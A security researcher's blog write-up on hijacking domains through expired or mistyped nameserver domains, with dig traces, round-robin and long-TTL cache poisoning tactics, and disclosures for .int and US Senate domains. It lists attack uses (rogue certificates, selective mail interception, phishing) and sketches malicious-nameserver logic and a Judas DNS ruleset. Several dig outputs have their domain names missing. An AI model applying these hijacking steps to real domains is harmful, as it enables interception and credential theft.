Calling on network administrators to prevent issues of this type in their own networks does not appear to be a winnable war either given the scale of DNS name collisions. While it’s important to notify and ensure that network admins understand this risk, ensuring that 100% of networks always configure things properly is a bit of a pipe dream.

A Privacy Nightmare

Given the fact that these machines in Guatemala appear to call out on a pretty regular basis, there are some fairly big privacy concerns with this issue. Many of the DNS requests had hostnames which were very personal in nature (think NANCY-PC, MYLAPTOP, etc). Since a DNS UPDATE query is sent due to a variety of triggers, the user’s personal computer would be phoning home to my nameserver every time they travelled, changed networks, or rebooted their machine. This would make it easy to monitor someone as they take their laptop from work, to home, to the local cafe, and so on. The internal IP addresses add to the privacy risk as well, given that they help map out the remote network’s IP scheme. All the while these people have no idea that their computer is silently reporting their location. Imagine something like the following being built based off of this data:

Note: The above map doesn’t reflect any real data and is purely for illustrative purposes.

Needless to say, the privacy concerns might raise a few eyebrows.

Ethical Handling of Research Data

Out of respect for the privacy of the people of Guatemala, the raw update query data collected from this research will never be published and has been securely deleted. Additionally, all further traffic from these computers will be routed to a special IP address to ensure that no further UPDATE queries will be sent for the rest of my domain registration term (of about two years). That IP address is special because it was specifically commissioned by ICANN to warn network administrators of name collision issues. The hope is that if a network admin/tech-savvy user in Guatemala sees DNS traffic being routed to this IP, they will Google it and immediately find that their network/AD setup is vulnerable to this issue.

Additionally, I’ve emailed the DNS admin of the .gt TLD informing her of this issue and asked that she change the MNAME to something no longer resolvable. Since nobody else can abuse this while I hold the registration, combined with the fact that I’m sinkholing all DNS traffic, and further that my domain registration term is two years, I’ve decided to publish this post despite the MNAME being unchanged as of this time. I imagine that two years of time for a patch falls within reason for patch expectations :).

Overall this was a fun experiment and highlights some very interesting ramifications of even minor TLD misconfigurations such as this one.

Until next time,


In a past piece of research, we explored the issue of nameserver domains expiring, allowing us to take over full control of a target domain. In that example we took over the domain name by buying an expired domain name which was authoritative for the domain. This previous example happened to have two broken nameservers, one being misconfigured and the other being an expired domain name. Due to this combination of issues the domain was totally inaccessible (until I bought the domain and rehosted the old website again). While this made it easier to take full control of the DNS of the domain (since most clients will automatically fail over to the working nameserver(s)), it also raises an important question: are there other domains where only some of the nameservers are not working, due to an expired domain name or some other takeover vulnerability? After all, as discussed in previous posts, there are many different ways for a nameserver to become vulnerable to takeover.

A Few Bad Nameservers

In an effort to find a proof-of-concept domain which suffered from having just a few of its nameservers vulnerable to takeover, I had to turn back to scanning the Internet. Luckily, since we have an old copy of the .int zone we can start there. After iterating through this list I was able to find yet another vulnerable .int domain. The website is totally functional and working, but two of its nameservers are actually expired domain names. Interestingly enough, unless you traverse the DNS tree you likely won’t even notice this issue. For example, here’s the output of an NS query against the domain:

[email protected] ~> dig NS

; <<>> DiG 9.8.3-P1 <<>> NS
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 9316
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0

;            IN    NS

;; ANSWER SECTION:
        86399    IN    NS
        86399    IN    NS

;; Query time: 173 msec
;; WHEN: Thu Dec  8 14:12:47 2016
;; MSG SIZE  rcvd: 81

As we can see from the above output, we’ve asked the resolver (Google’s public resolver) for the nameservers of the domain, and it has returned two nameservers with NOERROR as the status. The returned nameserver domain is not available; it is currently registered, working, and returning DNS records as expected. If this is the case, how is this domain vulnerable? It turns out that we are being slightly misled due to the way that dig works. Let’s break down what is happening with dig’s +trace flag:

[email protected] ~> dig +trace

; <<>> DiG 9.8.3-P1 <<>> +trace
;; global options: +cmd
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
.            209756    IN    NS
;; Received 228 bytes from in 30 ms

int.            172800    IN    NS
int.            172800    IN    NS
int.            172800    IN    NS
int.            172800    IN    NS
int.            172800    IN    NS
;; Received 365 bytes from in 88 ms

        86400    IN    NS
        86400    IN    NS
        86400    IN    NS
        86400    IN    NS
;; Received 127 bytes from in 353 ms

        86400    IN    A
        86400    IN    NS
        86400    IN    NS
;; Received 97 bytes from in 172 ms

This shows us dig’s process as it traverses the DNS tree. First, we can see it asks the root nameservers for the nameservers of the .int TLD. Next, dig asks one of the returned .int nameservers at random for the nameservers of our target domain. As we can see from this output, there are actually more nameservers which the .int TLD nameservers are recommending to us. However, despite dig receiving these nameservers, it hasn’t yet gotten what it’s looking for. Dig will continue down the delegation chain until it gets an authoritative response. Since the .int TLD nameservers are not authoritative for the zone, they don’t set the authoritative answer flag on the DNS response. DNS servers are supposed to set the authoritative answer flag when they are the owner of a specific zone. This is DNS’s way of saying “stop traversing the DNS tree, I’m the owner of the zone you’re looking for – ask me!”. Completing dig’s walk, we see that it picks a random nameserver returned by the .int TLD nameservers and asks it what the nameservers are for the domain. Since these nameservers are authoritative for the zone, dig takes this answer and returns it to us. Interestingly enough, if dig had encountered one of the non-working nameservers, it would simply have failed over to one of the working nameservers without letting us know.
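The walk dig performs can be approximated offline. The sketch below (hardcoded delegation data with hypothetical server names) descends from the root, follows a random nameserver from each referral, and stops only when a server answers with the AA flag set:

```python
# Toy model of dig's +trace walk. Each "server" is (aa_flag, records).
# All names here are invented; no real DNS queries are performed.
import random

SERVERS = {
    "root":           (False, {"int.": ["tld-a.example.", "tld-b.example."]}),
    "tld-a.example.": (False, {"target.int.": ["ns1.example.", "ns2.example."]}),
    "tld-b.example.": (False, {"target.int.": ["ns1.example.", "ns2.example."]}),
    "ns1.example.":   (True,  {"target.int.": ["ns1.example.", "ns2.example."]}),
    "ns2.example.":   (True,  {"target.int.": ["ns1.example.", "ns2.example."]}),
}

def trace(qname: str) -> list[str]:
    """Follow referrals from the root until a server answers with AA set."""
    path, server = [], "root"
    while True:
        aa, records = SERVERS[server]
        path.append(server)
        if aa:                      # authoritative answer: stop the walk
            return path
        # Non-authoritative: treat the response as a referral and pick
        # one of the delegated nameservers at random (as dig does).
        referral = records.get(qname, records.get("int."))
        server = random.choice(referral)

print(trace("target.int."))
```

Because the nameserver at each hop is chosen at random, a dead server in the referral set would simply never be reported back to the user.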

Domain Availability, Registry Truth & Sketchy DNS Configurations

Note: This is an aside from the main topic, feel free to skip this section if you don’t want to read about DNS sketchiness.

When I initially scanned for this vulnerability using some custom software I’d written, I received an alert that one of the nameserver domains was available for registration. However, when I queried for the domain using dig, I found something very odd:

[email protected] ~> dig A 

; <<>> DiG 9.8.3-P1 <<>> A
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18334
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;        IN    A

;; ANSWER SECTION:
    299    IN    A

;; Query time: 54 msec
;; WHEN: Sat Dec 17 23:35:00 2016
;; MSG SIZE  rcvd: 51

The above query shows that when we look up the A record (IP address) for the domain, we get a valid IP back. So, wait, is the domain actually responding with a valid record? How are we getting back an A record if the domain doesn’t exist? Things get even weirder when you ask what the nameservers are for the domain:

[email protected] ~> dig NS 

; <<>> DiG 9.8.3-P1 <<>> NS
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18589
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;        IN    NS

ph.            899    IN    SOA 2016121814 21600 3600 2592000 86400

;; Query time: 60 msec
;; WHEN: Sat Dec 17 23:34:50 2016
;; MSG SIZE  rcvd: 102

According to dig no nameservers are returned for our domain despite us getting an A record back just a moment ago. How can this be? After trying this query I was even less confident the domain was available at all, so I issued the following query to sanity check myself:

[email protected] ~> dig A

; <<>> DiG 9.8.3-P1 <<>> A
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 65010
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;    IN    A


;; Query time: 63 msec
;; WHEN: Sat Dec 17 23:39:24 2016
;; MSG SIZE  rcvd: 62

OK, so apparently all domains which don’t exist return an A record. What in the world is at that IP?! The following is a screenshot of what we get when we visit that IP in a browser:

The above makes it fairly clear what’s happening. Instead of simply failing to resolve, the TLD nameservers return an A record pointing to a page filled with questionable advertisements, as well as a notice that says “This domain is available to be registered”. This is likely done to make a little extra money from people attempting to visit non-existent domains. I’ll refrain from commenting on the ethics or sketchiness of this tactic and stick to how you can detect this with dig. The following query reveals how this is set up:

[email protected] ~> dig ANY '*'

; <<>> DiG 9.8.3-P1 <<>> ANY *
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 51271
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;*            IN    ANY

*        299    IN    A

;; Query time: 50 msec
;; WHEN: Sat Dec 17 23:49:15 2016
;; MSG SIZE  rcvd: 42

The above query shows that there is a wildcard A record set up for anything that matches * under the .ph TLD. This is why we saw this behaviour.

For an additional sanity check, one powerful tool which is always useful is historical data on domains. One of the largest collectors of historical DNS, WHOIS, and general Internet data that I know of is Domain Tools. After reaching out, they were kind enough to provide a researcher account for me, so I used their database to get the full story of vulnerabilities such as this one. Querying their dataset, we can understand when exactly this domain became vulnerable (expired) in the first place.


Interestingly enough, this historical data shows that this domain has likely been expired since 2013. The fact that this issue could have existed for this long shows that this type of vulnerability is subtle enough to go unnoticed for a long time (~4 years!). Crazy.

Back to the Takeover

Moving back to our takeover: once I realized that the nameserver domain was indeed available, I was able to register it and become an authoritative nameserver for the target domain. This is similar to the earlier example, but with an interesting caveat. When someone attempts to visit the site, there is about a 50% chance that our nameservers will be queried instead of the authentic ones. The reason for this is Round Robin DNS, a technique used in DNS to distribute load across multiple servers. The concept is fairly simple: in DNS you can return multiple records for a query if you want to distribute the load across a few servers. Since you want to distribute load evenly, you return these records in a random order so that querying clients will choose a different record each time they request it. In the case of a DNS A record, this would mean that if you returned three IP addresses in a random order, you should see that each IP address is used by your users roughly 33.33% of the time. We can see this in action if we attempt a few NS queries for the target domain directly against the .int TLD nameservers. We get the .int TLD nameservers by doing the following:

[email protected] ~> dig NS int.

; <<>> DiG 9.8.3-P1 <<>> NS int.
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 54471
;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 0

;int.                IN    NS

int.            52121    IN    NS
int.            52121    IN    NS
int.            52121    IN    NS
int.            52121    IN    NS
int.            52121    IN    NS

;; Query time: 38 msec
;; WHEN: Sun Dec 18 00:23:29 2016
;; MSG SIZE  rcvd: 153

We’ll pick one of these at random and ask it for the nameservers of our target domain a few times:

[email protected] ~> dig NS

; <<>> DiG 9.8.3-P1 <<>> NS
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 41151
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;            IN    NS

;; AUTHORITY SECTION:
        86400    IN    NS
        86400    IN    NS
        86400    IN    NS
        86400    IN    NS

;; Query time: 76 msec
;; WHEN: Sun Dec 18 00:23:35 2016
;; MSG SIZE  rcvd: 127

[email protected] ~> dig NS

; <<>> DiG 9.8.3-P1 <<>> NS
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 14215
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;            IN    NS

;; AUTHORITY SECTION:
        86400    IN    NS
        86400    IN    NS
        86400    IN    NS
        86400    IN    NS

;; Query time: 79 msec
;; WHEN: Sun Dec 18 00:23:36 2016
;; MSG SIZE  rcvd: 127

[email protected] ~> dig NS

; <<>> DiG 9.8.3-P1 <<>> NS
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 31489
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 4, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;            IN    NS

;; AUTHORITY SECTION:
        86400    IN    NS
        86400    IN    NS
        86400    IN    NS
        86400    IN    NS

;; Query time: 87 msec
;; WHEN: Sun Dec 18 00:23:37 2016
;; MSG SIZE  rcvd: 127

As can be seen above, each time we ask we get the nameservers back in a different order. This is the beauty of round robin DNS, since each nameserver will receive a roughly equal load of DNS queries. However, this complicates our attack because half of the time users will be querying the legitimate nameservers! So the question now becomes: how can we tip the odds in our favor?
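We can simulate the odds with a quick script. Assuming (hypothetically) that we control two of the four NS records and that a client takes the first record of a shuffled answer, we land on an attacker-controlled server about half the time:

```python
# Quick simulation of the round-robin situation: four NS records
# returned in random order, two of which we (hypothetically) control.
import random

NAMESERVERS = ["legit-ns1", "legit-ns2", "evil-ns1", "evil-ns2"]

def first_pick() -> str:
    rrset = NAMESERVERS[:]
    random.shuffle(rrset)       # the TLD rotates the answer order
    return rrset[0]

trials = 100_000
hits = sum(first_pick().startswith("evil") for _ in range(trials))
print(f"attacker chosen ~{hits / trials:.0%} of the time")   # ~50%
```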

May the RR Odds Be Ever in Our Favor

So, we can’t control the behaviour of the .int TLD servers and we’ll only be chosen approximately 50% of the time. As an attacker we need to figure out how to make that closer to 100%. Luckily, due to how DNS is structured, we can get very close.

When you visit a website and your computer does a DNS lookup for its records, it likely isn’t going to traverse the entire DNS tree to get the result. Instead it likely makes use of a DNS resolver, which performs this process on your behalf while caching all of the results. This resolver is assigned to your computer during the DHCP process and can be either a large shared resolver or a small resolver hosted on your local router or computer. The idea behind the resolver is that it can serve many clients making DNS requests and can speed up resolution by caching results. So if one client looks up a record and shortly afterwards another client does the same, the DNS tree doesn’t have to be traversed because the resolver already has a cached copy. The important point to realize here is that in DNS, caching is king. The side effects of this architecture are made more apparent when events like the DDoS attacks against Dyn knock the Internet offline for millions of users. As it turns out, when you put all your eggs in one basket, you’d better be sure the basket can hold up.

Caching is accomplished by DNS resolvers temporarily storing the results of a DNS query for however long the response’s TTL specifies. This means that if a response has a TTL of 120, for example, the caching resolver will likely obey this and return the same record for two minutes. There are upper limits to this value, but they’re resolver-dependent, and a TTL as long as a week will likely be honored without problems.
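A caching resolver’s TTL handling can be sketched as a tiny store with expiry timestamps. This is a simplified model (the one-week cap is an assumption for illustration, not a standardized value):

```python
# A minimal sketch of TTL-based caching: store the answer with an
# expiry timestamp and serve it until that passes. Real resolvers
# also clamp absurd TTLs to a local maximum (assumed one week here).
import time

MAX_TTL = 7 * 24 * 3600

class TinyCache:
    def __init__(self):
        self._store = {}

    def put(self, name: str, answer: str, ttl: int) -> None:
        ttl = min(ttl, MAX_TTL)
        self._store[name] = (answer, time.monotonic() + ttl)

    def get(self, name: str):
        entry = self._store.get(name)
        if entry is None:
            return None
        answer, expires = entry
        if time.monotonic() >= expires:   # TTL elapsed: evict the entry
            del self._store[name]
            return None
        return answer

cache = TinyCache()
cache.put("example.int.", "", 120)
print(cache.get("example.int."))   #
```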

Given this situation, we can win this game by setting longer TTLs than the legitimate servers for all of our authoritative responses. The situation essentially boils down to this:

  • User looks up the A record for to visit the site.
  • Due to the random choosing of nameservers from the .int TLD NS query results, the user has a 50% chance of choosing our poisoned nameserver.
  • Say the user doesn’t choose us and gets the legitimate nameservers; their resolver will record this result and cache it for the specified TTL of 21,745 seconds (approximately six hours), which is the current TTL for this record at the time of this writing.
  • Later on, the user attempts to visit the website after more than 6 hours have passed, again they traverse this tree but this time they get one of our malicious nameservers which we’ve taken over. We reply with a TTL of 604,800 seconds (one week), or with an even longer TTL depending on what we think we can get away with. The user’s cache records this value and will hold it for the length of the TTL we specified.
  • Now for an entire week the user, and, more importantly, all the other clients of the resolver will always use our falsified record.
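The arithmetic behind the steps above is straightforward: if each cache refresh independently picks our nameservers with probability 1/2 (an assumption based on the two-of-four split), the chance a resolver remains unpoisoned after k refreshes decays geometrically:

```python
# Back-of-the-envelope math: with an (assumed) 1/2 chance of landing on
# our nameservers at each cache refresh, the probability a resolver is
# still clean after k refreshes is (1/2)**k.

def still_clean(k: int, p_malicious: float = 0.5) -> float:
    return (1 - p_malicious) ** k

for k in (1, 4, 10):
    print(k, f"{still_clean(k):.4f}")
# 1 0.5000 / 4 0.0625 / 10 0.0010
```

So after a handful of TTL expiries, poisoning is close to a sure thing.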

This example becomes more extreme when you realize that many people and services make use of large shared resolvers like Google’s public resolvers or Dyn’s. At this level it’s only a matter of time until the resolver picks our poisoned nameservers, and we can poison all clients of this resolver (potentially millions) for a long period of time. Even better, with large resolvers we can easily test to see if we’ve succeeded and can act quickly when we know we’ve poisoned the community cache.

The Power of DNS

So, we can now poison the DNS for our target – but what power does this give us? What can we do with our newly gained privileges?

  • Issue arbitrary SSL/TLS certificates for the target domain: Due to the fact that many certificate authorities allow either DNS, HTTP, or email for domain name verification, we can easily set DNS records for servers we control to prove we own the target domain. Even if the CA chooses our target’s nameservers instead of ours, we can simply request again once the cache expires, until they eventually ask our malicious nameservers. This assumes the certificate authority’s certificate issuing system actually performs caching – if it doesn’t, we can simply try again immediately until our malicious servers are picked.
  • Targeted Email Interception: Since we can set MX records for our targets, we can set up our malicious servers to watch for DNS requests from specific targets like GMail, Yahoo Mail, or IANA’s mail servers and selectively lie about where to route email. This gives us the benefit of stealth because we can give legitimate responses to everyone querying except for the targets we care about.
  • Takeover of the .int Domain Name Itself: In the case of the .int TLD, if we want to change the owners or the nameservers of this domain at the registry, both the Administrative contact and the Technical contact must approve this change (assuming the policy is the same as IANA’s policy for root nameserver changes, which IANA also manages). You can see the example form on IANA’s website. Since both of the email addresses on the WHOIS are at the vulnerable domain, we have the ability to intercept mail for both. We can now wait until we see an MX DNS request from IANA’s IP range and selectively poison the results to redirect the email to our servers, allowing us to send and receive emails as the admin. Testing to see if IANA’s mail servers have been poisoned can be achieved by spoofing emails from the contact addresses and checking if the bounce email is redirected to our malicious mail servers. If we don’t receive it, we simply wait until the TTL of the legit mail servers is over and try again.
  • Easily Phish Credentials: Since we can change DNS we can rewrite the A records to point to our own phishing servers in order to steal employee credentials/etc.
  • MITM Devices via SRV Spoofing: Since we can also control SRV records, we can change these to force embedded devices to connect to our servers instead. This goes for any service which uses DNS for routing (assuming no other validation method is built into the protocol).
  • And much more…
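
The “selectively lie” trick that several of the bullets above rely on boils down to a single routing decision inside the malicious nameserver: answer honestly for everyone except resolvers in the IP ranges we care about. The sketch below illustrates just that decision logic (all hostnames and IP ranges are hypothetical placeholders, not values from the actual incident):

```python
import ipaddress

# Hypothetical values for illustration only.
TARGET_RESOLVERS = [ipaddress.ip_network("192.0.2.0/24")]  # e.g. the victim's resolver range
LEGIT_MX = "mail.example.int."      # the real mail server
EVIL_MX = "mx.attacker.example."    # our malicious mail server

def answer_mx(client_ip: str, qname: str) -> str:
    """Decide which MX record to hand back for a given querying resolver.

    Resolvers inside TARGET_RESOLVERS get the poisoned answer; everyone
    else sees the legitimate record, keeping the attack stealthy.
    """
    ip = ipaddress.ip_address(client_ip)
    if any(ip in net for net in TARGET_RESOLVERS):
        return EVIL_MX   # selectively lie to the target
    return LEGIT_MX      # legitimate answer for everyone else

print(answer_mx("192.0.2.53", "example.int."))    # targeted resolver -> poisoned MX
print(answer_mx("198.51.100.7", "example.int."))  # anyone else -> real MX
```

A real implementation would sit inside a full authoritative nameserver and proxy every other query through untouched, which is exactly what the Judas DNS tool described later does.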

So clearly this vulnerability can occur, but does it occur often? Sure, maybe one random .int website has this problem, but do any genuinely important websites suffer from this issue?

Not An Isolated Incident

The following is a screenshot from another website which was found to suffer from this same vulnerability, this time caused by something as simple as a typo in the nameserver hostname:


The vulnerable domain was an internal URL-shortening service for the United States Senate. The domain had a non-existent domain set as an authoritative nameserver, likely a typo of a sub-domain belonging to Akamai. This slight mistype caused a massive security issue where you want it the least: since the site’s very purpose is to redirect what are presumably members of the US Senate to arbitrary sites from links sent by other members, it would be a goldmine for an attacker wishing to do malicious DNS-based redirection for drive-by exploitation or targeted phishing attacks.

Due to the high risk and trivial exploitability of the issue, I purchased the nameserver domain myself and simply blocked DNS traffic to it (allowing the DNS queries to fail over to the remaining working servers). This essentially “plugged” the issue until it could be fixed by the administrators of the site. Shortly afterwards I reached out to the .gov registry, who forwarded my concerns to the site’s administrators, who fixed the issue extremely quickly (see the disclosure timeline below). All said and done, a very impressive response time! This does, however, highlight that this type of issue can happen to anyone. In addition to the two examples outlined here, many more exist which are not listed (for obvious reasons), demonstrating that this is not an isolated issue.

Disclosure Timeline

International Organization for Migration Disclosure

  • Dec 09, 2016: Contacted [email protected] with a request to disclose this issue (contact seemed appropriate per their website).
  • Dec 23, 2016: Due to lack of response forwarded previous email to WHOIS contacts.
  • Dec 23, 2016: Received response from Jackson (the organization’s Senior Information Security Officer) apologizing for missing the earlier email and requesting details of the problem.
  • Dec 23, 2016: Disclosed issue via email.
  • Dec 23, 2016: Confirmed receipt of issue, stating that the problem and implications are understood. States that it will be addressed internally and that an update will be sent when it has been fixed.
  • Dec 27, 2016: Update received from Jackson stating that IANA has been contacted and instructed to remove any reference to the domain in order to remediate the vulnerability. IANA states that this can take up to five business days to accomplish.
  • Dec 27, 2016: Asked if Jackson would also like the domain name back or if it should be left to expire.
  • Dec 27, 2016: Jackson confirms the domain name is no longer needed and it’s fine to let it expire.

Disclosure Notes: I got a quick response once I forwarded the info to the correct contacts; I should’ve gone for a broader CC with this disclosure and will keep that in mind for future disclosures. I didn’t expect such a quick response (or even a dedicated security person), so it was a nice surprise to have Jackson jump on the problem so fast.

United States Senate Disclosure

  • January 5, 2017: Reached out to .gov registry requesting responsible disclosure and offering PGP.
  • January 6, 2017: Response received from help desk stating they can forward any concerns to the appropriate contacts if needed.
  • January 6, 2017: Disclosed issue to help desk.
  • January 8, 2017: Nameserver patch applied, all nameservers are now correctly set!

Disclosure Notes: Again, I didn’t expect a patch this quick and was blown away by how fast the issue was fixed (less than two days!). In the past, reporting vulnerabilities to government agencies has been a super slow process, so this was a breath of fresh air. Really impressed!

Judas DNS – A Tool For Exploiting Nameserver Takeovers

In order to make the process of exploiting this unique type of vulnerability easier, I’ve created a proof-of-concept malicious authoritative nameserver which can be used once you’ve taken over a target’s nameserver. The Judas server proxies all DNS requests to the configured legitimate authoritative nameservers while also applying a custom ruleset to modify DNS responses when certain matching criteria are met. For more information on how it works, as well as the full source code, see the link below:

Judas DNS Github
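
To give a feel for how such a ruleset might be expressed, here is an illustrative JSON sketch. The field names below are reconstructed from memory of the project’s README and may not match the current format exactly, so treat the repository’s documentation as authoritative. The idea is: proxy everything to the real nameservers, but rewrite MX answers for queries coming from one specific source range:

```json
{
    "version": "1.0.0",
    "port": 2248,
    "dns_query_timeout": 10000,
    "target_nameservers": [ "ns1.example.int", "ns2.example.int" ],
    "rules": [
        {
            "name": "Redirect mail for targeted resolvers only",
            "query_type_matches": [ "MX" ],
            "ip_range_matches": [ "192.0.2.0/24" ],
            "modifications": [
                { "address": "mx.attacker.example" }
            ]
        }
    ]
}
```

All hostnames and IP ranges here are placeholders; everyone outside the matched range receives the legitimate, proxied response.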

Closing Thoughts

This vulnerability has all the trademarks of being a dangerous security issue. Not only is it an easy mistake to make via a typo or an expired nameserver domain, it also does not present any immediately obvious problems for availability due to the failover nature of many DNS clients. This means that not only can it happen to anyone, it means it can also go unnoticed for a long time.

On the topic of remediation, this issue is interesting because it could possibly be mitigated at the TLD level. If TLD operators did simple DNS health checks to ensure that all domain nameservers had at least the possibility of working (e.g. occasionally doing a simple A lookup to check whether an IP address is returned, or looking for NXDOMAIN) they could likely prevent this class of hijacking altogether. However, I suspect this would be a heavy-handed thing for TLDs to take on and could potentially be prone to error (what about nameservers that only serve private/internal network clients?). After all, if a TLD were to automatically remove nameservers of suspected vulnerable domains and it caused an outage, there would certainly be hell to pay. Still, there is definitely an interesting discussion to be had on how to fix these vulnerabilities at scale.
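
As a rough illustration of the kind of health check a registry could run, the following stdlib-only sketch flags delegations whose nameserver hostnames no longer resolve at all (the hostnames used are placeholders):

```python
import socket

def nameserver_is_resolvable(ns_hostname: str) -> bool:
    """Crude delegation health check: does the NS hostname resolve to any IP?

    A registry could periodically flag delegations whose nameserver
    hostnames return NXDOMAIN, since those are exactly the candidates
    for takeover by registering the dangling base domain.
    """
    try:
        socket.getaddrinfo(ns_hostname, 53)
        return True
    except socket.gaierror:
        return False

# "localhost" resolves via the hosts file; names under the reserved
# .invalid TLD (RFC 2606) are guaranteed never to resolve.
print(nameserver_is_resolvable("localhost"))            # True
print(nameserver_is_resolvable("ns1.example.invalid"))  # False
```

Of course, a check like this cannot distinguish a hijackable nameserver from one that intentionally answers only internal clients, which is precisely the false-positive problem that makes registry-level enforcement tricky.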


Thanks to @Baloo and @kalou000 for being extremely helpful resources on DNS/Internet-related information. Not many people can quote obscure DNS functionality off-hand, so being able to bounce ideas off of them was invaluable. Additional thanks to Gandi for providing enterprise access to their domain-checking API for security research purposes (such as this project!). This was amazing for checking domain existence because Gandi, as far as I’m aware, has the largest TLD support of any registrar, so they were perfect for this research (Nicaragua? Philippines? A random country in Africa? Yep, TLD supported).

Until next time,